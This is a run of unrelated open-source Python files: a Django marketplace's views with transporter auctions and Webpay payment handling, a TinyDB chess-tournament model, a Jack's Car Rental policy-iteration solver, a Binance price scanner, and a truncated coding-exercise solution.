(\"2\", \"Mediano\"),\n (\"3\", \"Pesado\"),\n )\n '''\n #Pallet: 1000 x 1000 mm\n Cajas= 32.0\n cantidad = SolicitudPK.cantidad_necesaria\n pallets=-(-cantidad // Cajas)\n\n tamañonecesario = ''\n if pallets >= 1 and pallets <=12:\n tamañonecesario= '1'\n elif pallets 
>12 and pallets <=32:\n tamañonecesario= '2'\n elif pallets > 32:\n tamañonecesario = '3'\n\n print(tamañonecesario)\n\n\n transportes=[]\n #Se trae solo a los transportistas disponibles\n transps = User.objects.filter(rol=\"4\",disponible=True)\n print(transps)\n for ut in transps:\n try:\n tg=Transporte.objects.get(transportista=ut,tamaño=tamañonecesario, refrigeracion=refrigeracionnecesaria)\n try:\n if Contrato.objects.get(usuario=ut,vigencia=True):\n transportes.append(tg)\n except Contrato.DoesNotExist:\n print('Transportista '+str(ut.username)+\" no tiene contrato vigente\")\n\n except:\n print('Transportista '+str(ut.username)+\" no califica por disponibilidad/tamaño/refrigeracion\")\n print(transportes)\n try:\n min_tarifa = min(transportes, key=attrgetter('tarifa'))\n except:\n print(\"No hay ningun transportista para calcular el precio minimo \")\n\n\n if len(transportes) >= 1:\n print(transportes)\n tganadores=[]\n for t in transportes:\n if t.tarifa <= min_tarifa.tarifa:\n tganadores.append(t)\n\n tganador=tganadores[0]\n\n print(tganadores)\n if tganador.tarifa <= min_tarifa.tarifa:\n print(str(tganador.tarifa)+str(min_tarifa.tarifa))\n SolicitudPK.transportista = tganador.transportista\n SolicitudPK.transporte = tganador\n #NOTIFICAR AL TRANSPORTISTA DE HABER GANADO LA SUBASTA\n '''\n tcorreo = tganador.transportista.email\n destino = productoganador.autor.direccion\n send_mail(\n 'SUBASTA DE TRANSPORTE ',\n 'Acabas de ganar la subasta de transporte y fuiste seleccionado para transportar los productos:\\nDestino: ',\n 'maipo_grande@gmail.com',\n [tcorreo],\n fail_silently=False,\n )\n '''\n if SolicitudPK.EstadoSolicitud == \"10\":\n SolicitudPK.EstadoSolicitud = \"10\"\n tganador.transportista.disponible=False\n tganador.transportista.save()\n SolicitudPK.save()\n messages.success(request, f'Se ha escogido un transportista adecuado para el envio.')\n elif SolicitudPK.EstadoSolicitud == \"6\":\n SolicitudPK.EstadoSolicitud = \"6\"\n tganador.transportista.disponible=False\n tganador.transportista.save()\n SolicitudPK.save()\n messages.success(request, f'Se ha escogido un transportista adecuado para el envio.')\n else:\n SolicitudPK.EstadoSolicitud = \"5\"\n tganador.transportista.disponible=False\n tganador.transportista.save()\n SolicitudPK.save()\n messages.success(request, f'Se ha escogido un transportista adecuado para el envio.')\n elif len(transportes) == 0:\n print(\"No hay transportistas disponibles en este momento\")\n messages.error(request, f'No hay transportistas que cumplan los requisitos en este momento, vuelve a intentarlo mas tarde.')\n\n '''Solicitud Pendiente'''\n if estadoactual == \"3\":\n SolicitudPK.EstadoSolicitud = '3' \n '''Rechazado'''\n if estadoactual == \"2\":\n SolicitudPK.EstadoSolicitud = '2' \n\n\n SolicitudPK.save() \n return redirect('/Solicitudes')\n else: \n form = FormSolicitudEstado(instance=SolicitudPK) \n context ={'form':form,}\n return render(request, 'modificarsoli.html', context)\ndef modificarSolicitudTransportista(request,pk):\n cart = Cart(request)\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudEstadoTransportista(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n\n if soli.EstadoSolicitud == \"13\":\n inputdni = request.POST.get('dni')\n\n dni = soli.cliente.dni\n print(dni)\n print(inputdni)\n if dni == inputdni:\n soli.transporte.disponible = True\n 
soli.save()\n messages.success(request, f'Comprobacion de destinatario correcta')\n return redirect('/solicitudesTransportista')\n else:\n messages.error(request, f'El dni del cliente no coincide con el de la solicitud.')\n \n elif soli.EstadoSolicitud != \"13\":\n soli.save() \n messages.success(request, f'Guardado exitosamente')\n return redirect('/solicitudesTransportista')\n else:\n form = FormSolicitudEstadoTransportista(instance=soli)\n context = { 'form': form }\n return render(request, 'modificarsoli.html', context)\ndef modificarSolicitudRevisor(request, pk):\n cart = Cart(request)\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudEstadoRevisor(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n soli.save()\n if soli.transportista:\n\n messages.success(request, f'Revision aprobada, el transportista ya puede llevar los productos')\n else:\n messages.warning(request, f'Revision aprobada, pero aun falta asignar un transportista al pedido')\n\n return redirect('/solicitudesRevisor')\n else:\n form = FormSolicitudEstadoRevisor(instance=soli)\n context = { 'form': form }\n return render(request, 'modificarsoli.html', context)\n\ndef modificarSolicitudProductor(request, pk):\n cart = Cart(request)\n\n enbodega=[]\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudEstadoProductor(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.save()\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n if soli.EstadoSolicitud == '6':\n \n for p in soli.producto.all():\n Post_producto =Post_productos.objects.get(post=soli, producto=p)\n if p.autor == request.user:\n Post_producto.enbodega=True\n Post_producto.save()\n enbodega.append(Post_producto.enbodega)\n\n cantprod = len(soli.producto.all())\n n= 0\n for e in enbodega:\n if e == True:\n n=n+1\n if cantprod == n:\n soli.EstadoSolicitud = '6'\n soli.save()\n \n print(cantprod)\n print(n)\n messages.success(request, f'Has avisado que tus productos estan en bodega')\n return redirect('/solicitudesProductor')\n else:\n form = FormSolicitudEstadoProductor(instance=soli)\n context = { 'form': form }\n return render(request, 'modificarsoli.html', context)\ndef modificarSolicitudClienteExterno(request, pk):\n cart = Cart(request)\n soli= Post.objects.get(pk=pk)\n if request.method == 'POST':\n form = FormSolicitudClienteExterno(request.POST,instance=soli)\n if form.is_valid():\n soli = form.save(commit=False)\n soli = Post.objects.get(pk = pk)\n soli.EstadoSolicitud = form.cleaned_data['EstadoSolicitud']\n #SI ELIJE \"PAGAR\" ENTONCES DESPLEGAR EL WEBPAY:\n #CALCULO TOTAL DIVIDIDO ENTRE LOS PRODUCTORES \n if soli.EstadoSolicitud == \"14\":\n totalprods=0\n cantidadprods = len(soli.producto.all())\n cantidaddivida = soli.cantidad_actual//cantidadprods\n for p in soli.producto.all():\n totalprods= totalprods+ (cantidaddivida* p.precio) \n print(totalprods)\n #Se suma la tarifa al total y se agrega la comision (3%)\n total= (soli.transporte.tarifa + totalprods) *1.03\n total = int(total)\n soli.save()\n return redirect('/pagar/'+str(total) +'/'+str(pk))\n \n messages.warning(request, f'Pedido rechazado, se notificará al seguro para su devolución')\n return redirect('/solicitudesClienteExterno')\n else:\n form = FormSolicitudClienteExterno(instance=soli)\n context = { 'form': form 
}\n return render(request, 'modificarsoli.html', context)\ndef registrarTransporte (request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormRegistrarTransporte(request.POST)\n if form.is_valid():\n transp = form.save(commit=False)\n transp.transportista = request.user\n transp.save()\n messages.success(request, f'Transporte Registrado')\n return redirect('/registrarTransporte')\n else:\n form = FormRegistrarTransporte()\n context = { 'form': form }\n return render(request, 'registrarTransporte.html', context)\n\ndef transportesRegistrados(request):\n cart = Cart(request)\n transp = Transporte.objects.filter(transportista=request.user)\n context={'transp':transp}\n\n return render(request, 'transportesRegistrados.html', context)\n\n\n\n\ndef Ventalocal(request):\n cart = Cart(request)\n products = Producto.objects.filter(Saldo=True)\n context={'products':products}\n cart = Cart(request)\n return render(request, 'Venta-local.html', context )\n\n\n'''Carrito funcional'''\n\n@csrf_protect\ndef add_product_catalogo(request, product_id):\n cart = Cart(request)\n cantidadacomprar=0\n product = Producto.objects.get(pk=product_id)\n\n for (key, value) in request.session['cart'].items():\n print(value['product_id'])\n print(product.pk)\n if value['product_id'] == product.pk: \n cantidadacomprar= product.cantidad- int(value['quantity'])\n if cantidadacomprar > 0:\n cart.add(product=product)\n messages.success(request, f'{product.get_producto_display()} agregado al carrito')\n else:\n messages.warning(request, f'No quedan mas unidades de este producto') \n\n return redirect(\"/Venta-local\")\n\n\ndef add_product_carrito(request, product_id):\n cart = Cart(request)\n product = Producto.objects.get(id=product_id)\n cart.add(product=product)\n return redirect(\"/carrito.html\")\n\n\n\n\n@csrf_protect\ndef remove_product(request, product_id):\n cart = Cart(request)\n product = Producto.objects.get(id=product_id)\n cart.remove(product)\n return redirect(\"/carrito.html\")\n\n\n@csrf_protect\ndef decrement_product(request, product_id):\n cart = Cart(request)\n product = Producto.objects.get(id=product_id)\n cart.decrement(product=product)\n return redirect(\"/carrito.html\")\n\n\n@csrf_protect\ndef clear_cart(request):\n cart = Cart(request)\n cart.clear()\n return redirect(\"/carrito.html\")\n\ndef webpay(request):\n cart = Cart(request)\n total = 0\n FprecioC = 0\n cart = Cart(request)\n buy_order = str(1)\n session_id = str(1)\n return_url = 'http://127.0.0.1:8000/terminarsaldo'\n total = 0\n FprecioC = 0\n if request.user.is_authenticated:\n for key, value in request.session['cart'].items():\n total = total + (float(value['price']) * value['quantity'])\n # FprecioC=(f'{total:.3f}')\n FprecioC= int(total)\n amount = FprecioC\n try:\n response = Transaction().create(buy_order, session_id, amount, return_url)\n print(amount)\n return render(request, 'carrito.html', {\"response\":response})\n except TransbankError as e:\n print(e.message)\n return render(request, 'carrito.html', {})\n\n\ndef webpaycommit(request):\n cart = Cart(request)\n productos= []\n cantidades=[]\n for key,value in request.session['cart'].items():\n \n cantidadpujada = int(value['quantity'])\n id = value['product_id']\n\n product = Producto.objects.get(pk=id) \n product.cantidad= product.cantidad-cantidadpujada\n \n \n \n productos.append([product, cantidadpujada])\n\n\n print(productos)\n token = request.GET.get(\"token_ws\")\n response = Transaction().commit(token) \n response['transaction_date'] = 
datetime.strptime(response['transaction_date'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n return render(request, 'terminarsaldo.html',{\"token\": token,\"response\": response, \"productos\":productos})\n \n\ndef webpayplus_reembolso(request):\n cart = Cart(request)\n token = request.POST.get(\"token_ws\")\n amount = request.POST.get(\"amount\")\n try:\n response = Transaction().refund(token, amount)\n print(response)\n print(token)\n return render(request, 'reembolso.html', {\"token\":token, \"amount\": amount, \"response\":response})\n except TransbankError as e:\n print(e.message)\n return render(request, 'reembolso.html', {})\n\ndef webpayplus_anular(request):\n cart = Cart(request)\n return render(request, 'anular.html', {})","repo_name":"zexza/FeriaMovil","sub_path":"feriavirtual/feriavirtualapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":49560,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17305911659","text":"from tinydb import TinyDB\n\ntournoi_bdd = TinyDB('models/tournoi.json')\n\nclass Tournoi:\n \"\"\"creer une instance de tournoi\"\"\"\n\n def __init__(self, nom_tournoi=None,\n lieu_tournoi=None,\n date_tournoi=None,\n nombre_de_tour_tournoi=4,\n liste_des_tours=None,\n controle_du_temps=None,\n identifiants_joueurs_tournoi=None,\n identifiant_tournoi=None,\n description_tournoi=None\n ):\n self.nom_tournoi = nom_tournoi\n self.lieu_tournoi = lieu_tournoi\n self.date_tournoi = date_tournoi\n self.nombre_de_tour_tournoi = nombre_de_tour_tournoi\n self.liste_des_tours = liste_des_tours\n self.controle_du_temps = controle_du_temps\n self.identifiants_joueur = identifiants_joueurs_tournoi\n self.identifiant_tournoi = identifiant_tournoi\n self.description_tournoi = description_tournoi\n\n def serialiser_tournoi(self):\n dico_donnees_tournoi = {}\n dico_donnees_tournoi[\"nom tournoi\"] = self.nom_tournoi\n dico_donnees_tournoi[\"lieu tournoi\"] = self.lieu_tournoi\n dico_donnees_tournoi[\"date tournoi\"] = self.date_tournoi\n dico_donnees_tournoi[\"nombre de tour tournoi\"] = self.nombre_de_tour_tournoi\n dico_donnees_tournoi[\"liste de tour tournoi\"] = self.liste_des_tours\n dico_donnees_tournoi[\"controle du temps\"] = self.controle_du_temps\n #dico_donnees_tournoi[\"identifiants des joueurs du tournoi\"] = self.identifiants_joueurs_tournoi\n #dico_donnees_tournoi[\"identifiant du tournoi\"] = self.identifiant_tournoi\n #dico_donnees_tournoi[\"description du tournoi\"] = self.description_tournoi\n return dico_donnees_tournoi\n\n def deserialiser_tournoi(self, tournoi_serialise):\n nom_tournoi = tournoi_serialise[\"nom tournoi\"]\n lieu_tournoi = tournoi_serialise[\"lieu tournoi\"]\n date_tournoi = tournoi_serialise[\"date tournoi\"]\n nombre_de_tour_tournoi = tournoi_serialise[\"nombre de tour tournoi\"]\n liste_des_tours = tournoi_serialise[\"liste de tour tournoi\"]\n controle_du_temps = tournoi_serialise[\"controle du temps\"]\n identifiants_joueurs_tournoi = tournoi_serialise[\"identifiants des joueurs du tournoi\"]\n identifiant_tournoi = tournoi_serialise[\"identifiant du tournoi\"]\n description_tournoi = tournoi_serialise[\"description du tournoi\"]\n return Tournoi(nom_tournoi, lieu_tournoi, date_tournoi, nombre_de_tour_tournoi, liste_des_tours,\n controle_du_temps, identifiants_joueurs_tournoi, identifiant_tournoi, description_tournoi)\n\n def ajouter_tournoi_bdd(self, dico_donnees_tournoi):\n self.tournoi = Tournoi(dico_donnees_tournoi[\"nom tournoi\"],\n dico_donnees_tournoi[\"lieu 
tournoi\"],\n dico_donnees_tournoi[\"date tournoi\"],\n dico_donnees_tournoi[\"nombre de tour tournoi\"],\n dico_donnees_tournoi[\"controle du temps\"],\n dico_donnees_tournoi[\"description du tournoi\"]\n #dico_donnees_tournoi[\"identifiants des joueurs du tournoi\"]\n )\n identifiant_tournoi = tournoi_bdd.insert(self.tournoi.serialiser_tournoi())\n tournoi_bdd.update({\"id\": identifiant_tournoi}, doc_ids=[identifiant_tournoi])\n\n\nclass Tour:\n \"\"\"creer une instance de tour\"\"\"\n\n def __init__(self, nom_tour=None,\n date_debut_tour=None,\n date_fin_tour=None,\n liste_de_match_fini=None):\n if liste_de_match_fini is None:\n liste_de_match_fini = []\n self.nom_tour = nom_tour\n self.date_debut_tour = date_debut_tour\n self.date_fin_tour = date_fin_tour\n self.liste_de_match_fini = liste_de_match_fini\n","repo_name":"mica12/P04","sub_path":"models/tournoi_model.py","file_name":"tournoi_model.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17144353017","text":"\nimport numpy as np\nfrom scipy.stats import poisson\nimport matplotlib.pyplot as plt\nimport itertools\nimport copy\n\nclass CarRental:\n \"\"\" Implementation of Jack's Car Rental enviornment, example 4.2 of\n Chapter 4 of \"Reinforcement Learning, an Introduction\" by Sutton and\n Barto. \n\n Jack manages a car rental at two locations. Each day, a random\n number of customers arrive at each location to rent cars, and a\n random number of cars get returned at each location. The numbers are\n drawn from a Poisson distribution. Jack makes profit for each car that is\n rented, but if he does not have a car at a location when requested, then\n that business is lost. In order to ensure cars are avaliable when requested,\n he can move some number of cars between the two locations over night. 
Cars\n that are returned are avaliable for rental the following day.\n \"\"\"\n def __init__(self, max_cars, max_move, move_car_cost, free_move, parking_penalty,\n rent_credit, lmbda1_rent, lmbda2_rent, lmbda1_rtn,\n lmbda2_rtn, max_limit):\n \"\"\" Initializes the car rental.\n\n @type max_cars: int\n Maximum number of cars at each rental location at any given time.\n Any extra cars that arrive are returned to a distribution center and\n disappear from the problem.\n @type max_move: int\n The maximum number of cars Jack can move from one place to another per\n night.\n @type move_car_cost: int\n The cost for moving each car between locations over night.\n @type free_move: int\n The number of free moves from location 1 to location 2 per night.\n @type parking_penalty: int\n Penalty incurred for each location when the number of cars there\n exceeds 10.\n @type rent_credit: int\n The profit per car rented out.\n @type lmbda1_rent: int\n The average value of the poission distribution for rentals at location 1.\n @type lmbda2_rent: int\n The average value of the poission distribution for rentals at location 2.\n @type lmbda1_rtn: int\n The average value of the poission distribution for returns at location 1.\n @type lmbda2_rtn: int\n The average value of the poission distribution for returns at location 2.\n @type max_limit: int\n The maximum number of rentals and returns considered when computing state\n transition probabilities.\n\n \"\"\"\n self.max_cars = max_cars\n self.max_move = max_move\n self.free_move = free_move\n self.parking_penalty = parking_penalty\n self.move_car_cost = move_car_cost\n self.rent_credit = rent_credit\n self.lmbda1_rent = lmbda1_rent\n self.lmbda2_rent = lmbda2_rent\n self.lmbda1_rtn = lmbda1_rtn\n self.lmbda2_rtn = lmbda2_rtn\n self.probs = np.zeros((max_limit+1,max_limit+1,max_limit+1,max_limit+1))\n\n for rent1, rent2, rtn1, rtn2 in itertools.product(range(max_limit+1), repeat = 4):\n p_rent1 = poisson.pmf(rent1, self.lmbda1_rent)\n p_rent2 = poisson.pmf(rent2, self.lmbda2_rent)\n p_rtn1 = poisson.pmf(rtn1, self.lmbda1_rtn)\n p_rtn2 = poisson.pmf(rtn2, self.lmbda2_rtn)\n self.probs[rent1, rent2, rtn1, rtn2] = p_rent1 * p_rent2 * p_rtn1 * p_rtn2\n\n\n\n def getProb(self, rent1, rent2, rtn1, rtn2):\n \"\"\" Gets the probability of the state transition given the number of\n rentals and returns at each location during a day.\n\n @type rent1: int\n Number of cars rented out in location 1.\n @type rent2: int\n Number of cars rented out in location 2.\n @type rtn1: int\n Number of cars returned in location 1.\n @type rtn2: int\n Number of cars returned in location 2.\n @rtype: float\n Probability of transition.\n \"\"\"\n return self.probs[rent1, rent2, rtn1, rtn2]\n \n\n def getNextState(self, rent1, rent2, rtn1, rtn2, n1, n2, moved):\n \"\"\" Gets the next state given the current state, number of\n cars moved over night, and the number of rentals and returns\n at each location during the following day.\n\n @type rent1: int\n Number of cars rented out in location 1.\n @type rent2: int\n Number of cars rented out in location 2.\n @type rtn1: int\n Number of cars returned in location 1.\n @type rtn2: int\n Number of cars returned in location 2.\n @type n1: int\n Number of cars currently at location 1.\n @type n2: int\n Number of cars currently at location 2.\n @type moved: int\n Number of cars moved from location 1 to 2 over night.\n If moved < 0, then it representents moving from 2 to 1.\n @rtype: tuple[int]\n A tuple of 2 numbers representing the number of cars\n at 
location 1 and 2 at the end of the following day.\n \n \"\"\"\n \n if moved >= 0: moved = min(n1, moved)\n else: moved = - min(n2, -moved)\n\n new_n1 = max(0, n1 - moved - rent1)\n new_n2 = max(0, min(n2 + moved, self.max_cars) - rent2)\n\n return int(min(new_n1 + rtn1, self.max_cars)), int(min(new_n2 + rtn2, self.max_cars))\n\n def getReward(self, rent1, rent2, n1, n2, moved):\n \"\"\" Gets the reward given the current state, tne number of cars moved over night,\n and the number of rentals in the following day.\n\n @type rent1: int\n Number of cars rented out in location 1.\n @type rent2: int\n Number of cars rented out in location 2.\n @type n1: int\n Number of cars currently at location 1.\n @type n2: int\n Number of cars currently at location 2.\n @type moved: int\n Number of cars moved from location 1 to 2 over night.\n If moved < 0, then it representents moving from 2 to 1.\n @rtype: int\n Reward value\n \"\"\"\n if moved >= 0: moved = min(n1, moved)\n else: moved = - min(n2, -moved)\n \n reward = 0\n reward += min(rent1, n1 - moved)*self.rent_credit\n reward += min(rent2, min(n2 + moved, self.max_cars))*self.rent_credit\n\n if moved > self.free_move: reward -= (moved - self.free_move)*self.move_car_cost\n elif moved < 0: reward -= abs(moved)*self.move_car_cost\n\n if n1 - moved > 10: reward -= self.parking_penalty\n if n2 + moved > 10: reward -= self.parking_penalty\n\n return reward\n \nclass PolicyEvaluation:\n \"\"\"Iterative Policy Evaluation\n\n A class to find the state value function given a determinstic policy.\n \n \"\"\"\n \n def __init__(self, max_cars, pi, R, t, p, gamma, threshold, max_limit, V0):\n \"\"\" Initializes the IPE\n\n @type max_cars: int\n Maximum number of cars at each location\n @type pi: function(n1, n2) -> int\n The policy for which the state value function is to\n be evaluated. The policy takes as input n1, n2 representing\n the number of cars at locations 1 and 2, and outputs the number\n of cars to move from 1 to 2.\n @type R: function(rent1, rent2, n1, n2, moved) -> int\n The reward function. Outputs the reward.\n @type t: function(rent1, rent2, rtn1, rtn2, n1, n2, moved) -> tuple[int]\n The state transition function. Outputs the next state.\n @type p: function(rent1, rent2, rtn1, rtn2) -> float\n The probability of a state transition.\n @type gamma: float\n The discount factor\n @type threshold: float\n The threshold tolerance for the state value function. 
The\n iteration will terminate when the maximum difference in the\n state value function across all states between two successive\n iterations is smaller than threshold.\n @type max_limit: int\n The maximum number of rentals and returns considered when computing state\n transition probabilities.\n @type V0: array[float]\n The initial state values, where V0[n1][n2] is the state value for n1 and n2\n cars at location 1 and 2 respectively.\n \n \"\"\"\n self.t = t\n self.R = R\n self.p = p\n self.pi = pi\n self.V = V0\n self.gamma = gamma\n self.threshold = threshold\n self.max_limit = max_limit\n\n def train(self):\n \"\"\" Performs iterative policy evaluation until the difference in\n values across all states between two successive iterations is less\n than a threshold.\n\n \"\"\"\n delta = float('inf')\n\n tuples = [(a,b,c,d) for a,b,c,d in itertools.product(range(self.max_limit+1), repeat = 4)]\n \n while delta >= self.threshold:\n delta = 0\n for n1 in range(max_cars+1):\n for n2 in range(max_cars+1):\n v = self.V[n1][n2]\n \n moved = self.pi[n1][n2]\n\n new_v = 0.0 \n for rent1, rent2, rtn1, rtn2 in tuples:\n \n new_n1, new_n2 = self.t(rent1, rent2, rtn1, rtn2, n1, n2, moved)\n prob = self.p(rent1, rent2, rtn1, rtn2)\n r = self.R(rent1, rent2, n1, n2, moved)\n \n new_v += prob*(r + self.gamma * self.V[new_n1][new_n2])\n\n\n self.V[n1][n2] = new_v\n delta = max(delta, abs(v-new_v))\n print('Current Delta is: ', delta)\n\n \n\n \n def getValues(self):\n \"\"\" Returns the current values for each state\n @rtype: list[float]\n \"\"\"\n return self.V\n\nclass PolicyImprovement:\n \"\"\" Given a state value function, improves the policy greedily by choosing\n an action providing the highest value for the subsequent state.\n\n \"\"\"\n def __init__(self, V, max_move, R, t, p, gamma, max_limit):\n \"\"\" Initializes the policy improvement\n\n @type V: array[float]\n The state values, where V[n1][n2] is the state value for n1 and n2\n cars at location 1 and 2 respectively.\n @type max_move: int\n The maximum number of cars that can be moved from one location to\n the other in one night.\n @type R: function(rent1, rent2, n1, n2, moved) -> int\n The reward function. Outputs the reward.\n @type t: function(rent1, rent2, rtn1, rtn2, n1, n2, moved) -> tuple[int]\n The state transition function. 
Outputs the next state.\n        @type p: function(rent1, rent2, rtn1, rtn2) -> float\n            The probability of a state transition.\n        @type gamma: float\n            The discount factor\n        @type max_limit: int\n            The maximum number of rentals and returns considered when computing state\n            transition probabilities.\n        \n        \"\"\"\n        self.V = V\n        self.pi = np.zeros(np.shape(self.V))\n        self.max_move = max_move\n        self.R = R\n        self.t = t\n        self.p = p\n        self.gamma = gamma\n        self.max_limit = max_limit\n\n    def improve(self):\n        \"\"\" Constructs a policy by taking the action at each state that maximizes the\n            state value for the subsequent state.\n        \"\"\"\n        \n        tuples = [(a,b,c,d) for a,b,c,d in itertools.product(range(self.max_limit+1), repeat = 4)]\n        \n        for n1 in range(len(self.V)):\n            for n2 in range(len(self.V[0])):\n                rewards = []\n                for action in range(-min(self.max_move, n2), min(self.max_move, n1)+1):\n                    v = 0\n                    for rent1, rent2, rtn1, rtn2 in tuples:\n\n                        new_n1, new_n2 = self.t(rent1, rent2, rtn1, rtn2, n1, n2, action)\n                        prob = self.p(rent1, rent2, rtn1, rtn2)\n                        r = self.R(rent1, rent2, n1, n2, action)\n                        \n                        v += prob * (r + self.gamma * self.V[new_n1][new_n2])\n                    \n                    rewards.append(v)\n                \n                self.pi[n1][n2] = rewards.index(max(rewards)) - min(self.max_move, n2)\n\n    def getPolicy(self):\n        \"\"\" Gets the current policy\n\n        @rtype: array[int]\n            The current policy pi, where pi[n1][n2] is the number of cars\n            to be moved over night when the current number of cars is n1, n2\n            at locations 1 and 2 respectively.\n        \"\"\"\n        return self.pi\n\n\n    \n    \n    \nif __name__ == \"__main__\":\n    \n    max_cars = 20\n    max_move = 5\n    free_move = 0\n    parking_penalty = 0\n    move_car_cost = 2\n    rent_credit = 10\n    \n    lmbda1_rent = 3\n    lmbda2_rent = 4\n    lmbda1_rtn = 3\n    lmbda2_rtn = 2\n\n    gamma = 0.9\n    threshold = 1\n    max_limit = 10\n\n    # Car rental environment\n    rental = CarRental(max_cars, max_move, move_car_cost, free_move, parking_penalty,\n                 rent_credit, lmbda1_rent, lmbda2_rent, lmbda1_rtn,\n                 lmbda2_rtn, max_limit)\n\n\n    # Initializing state values and policy\n    V = np.zeros((max_cars+1, max_cars+1))\n    pi = np.zeros((max_cars+1, max_cars+1))\n\n    # Number of cycles to run\n    cycles = 5\n    \n    for cycle in range(cycles):\n\n        print(\"Current cycle: \", cycle + 1)\n\n        # Policy Evaluation\n        PE = PolicyEvaluation(max_cars, pi, rental.getReward, rental.getNextState, rental.getProb, gamma, threshold, max_limit, copy.deepcopy(V))\n\n        PE.train()\n\n        print(\"Policy evaluated!\")\n\n        # Policy Improvement\n        new_V = PE.getValues()\n\n        PI = PolicyImprovement(new_V, max_move, rental.getReward, rental.getNextState, rental.getProb, gamma, max_limit)\n\n        PI.improve()\n\n        print(\"Policy improved!\")\n        \n        pi = PI.getPolicy()\n\n        V = new_V\n\n    # Plotting final results\n    plt.figure()\n    plt.imshow(pi, origin='lower', interpolation='none')\n    plt.title(\"Final Policy\")\n    plt.xlabel(\"# of cars at location 1\")\n    plt.ylabel(\"# of cars at location 2\")\n\n    plt.figure()\n    plt.imshow(V, origin='lower', interpolation='none')\n    plt.title(\"Final Value Function\")\n    plt.xlabel(\"# of cars at location 1\")\n    plt.ylabel(\"# of cars at location 2\")\n    \n    plt.show()\n","repo_name":"lolcharles2/Reinforcement_learning_book_implementations","sub_path":"Ch4/jacks_car_rental.py","file_name":"jacks_car_rental.py","file_ext":"py","file_size_in_byte":15096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"10125637370","text":"# !/usr/bin/python3\n# This script uses \n# %% BINANCE SCANNER\nimport asyncio\nimport json\nimport 
pprint\nimport time\nfrom datetime import datetime\npp = pprint.PrettyPrinter(indent=4)\nfrom websocket import create_connection\nfrom importlib import reload\nfrom numpy import diff\nimport statistics\nimport pandas as pd\nimport trader\n\n# Rolling window length used for smoothing\nn = 120\n# Use this as the timeframe for trading.\nGETSOME = 10\n\nreload(trader)\n# Create the Binance API client.\nbinance = trader.biance_api()\n# Get a file object with read permission.\nfile_object = open('binance_pairs.txt', 'r')\n# Load JSON file data to a python dict object.\ndict_object = json.load(file_object)\n\nscanner = {}\nnumber_of_trades_per_minutes = {}\n\nbest = None\nworst = None\nhighest_variance = None\nhighest_std_dev = None\n\nfor pair in dict_object['unique_pairs']:\n    # print(f'Scanning --> {pair}')\n\n    pair_list = []\n    num_trades_list = []\n    klineDate = binance.get_kline_timeframe(pair, timeframe='1m')\n    for kline in klineDate:\n        # print('open', kline[1])\n        # 8 is index for volume, 2 is index for open price?\n        pair_list.append(float(kline[2]))\n        num_trades_list.append(float(kline[8]))\n    \n    mean_numberofTrades = statistics.mean(num_trades_list)\n    number_of_trades_per_minutes[pair] = mean_numberofTrades\n    \n    if mean_numberofTrades < 16:\n        continue\n    print(f'Scanning --> {pair}')\n\n    # Normalize\n    amin, amax = min(pair_list), max(pair_list)\n    for i, val in enumerate(pair_list):\n        pair_list[i] = (val-amin) / (amax-amin)\n\n    _ = pair_list\n    pair_list = pd.Series(pair_list).rolling(window=n).mean().iloc[n-1:].values\n\n    # Take the first derivative\n    derv = diff(pair_list)\n\n    average = sum(derv[-GETSOME:]) / len(derv[-GETSOME:])\n\n    variance = statistics.variance(derv)\n    standard_deviation = float(statistics.stdev(derv))\n\n    # Nondimensional distance from the moving average\n    dMA = sum(_[-GETSOME:]-pair_list[-GETSOME:]) / GETSOME\n\n    scanner[pair] = [average, variance, standard_deviation, mean_numberofTrades, dMA]\n    # _scanner = scanner\n\n    # Sort the results according to index 4 of kv (key value); 
the forth represents distance from moving average.\n sorted_scan = sorted(scanner.items(), key=lambda kv: kv[1][4])\n\n # for i in _scanner:\n # # pp.pprint(scanner[i])\n # ii = [abs(float(iii))**-1 if iii != 0.0 else 0 for iii in _scanner[i] ]\n # _scanner[i] = ii\n # # pp.pprint(scanner[i])\n # # assert 1 == 2\n # sorted_scan_closes_to_zero = sorted(_scanner.items(), key=lambda kv: kv[1][0])\n # print(sorted_scan_closes_to_zero)\n\n # Start printing lists only when we have enough\n if len(sorted_scan) > 10:\n print('LOWEST')\n pp.pprint([i[0] for i in sorted_scan[:10]])\n print('HIGHEST')\n pp.pprint([i[0] for i in sorted_scan[-10:]])\n # print('CLOSEST TO ZERO')\n # pp.pprint([i[0] for i in sorted_scan_closes_to_zero[-10:]])\n else:\n pp.pprint(sorted_scan)\n # pp.pprint(number_of_trades_per_minutes)\n # assert 1 == 2 \n","repo_name":"tristanCB/BinanceTrader","sub_path":"binance_scanner.py","file_name":"binance_scanner.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73447000146","text":"# 전봇대\n\nT = int(input())\nfor TC in range(1, T+1):\n N = int(input())\n Pole = [list(map(int, input().split())) for _ in range(N)]\n # 개수 초기화\n count = 0\n # 전선 교차하는 개수 구하기\n for i in range(N):\n for j in range(N):\n if Pole[i][0] > Pole[j][0] and Pole[i][1] < Pole[j][1]:\n count += 1\n elif Pole[i][0] < Pole[j][0] and Pole[i][1] > Pole[j][1]:\n count += 1\n # 중복되는 전선수 제외하기 위해 2로 나누기\n print(\"#{} {}\".format(TC, 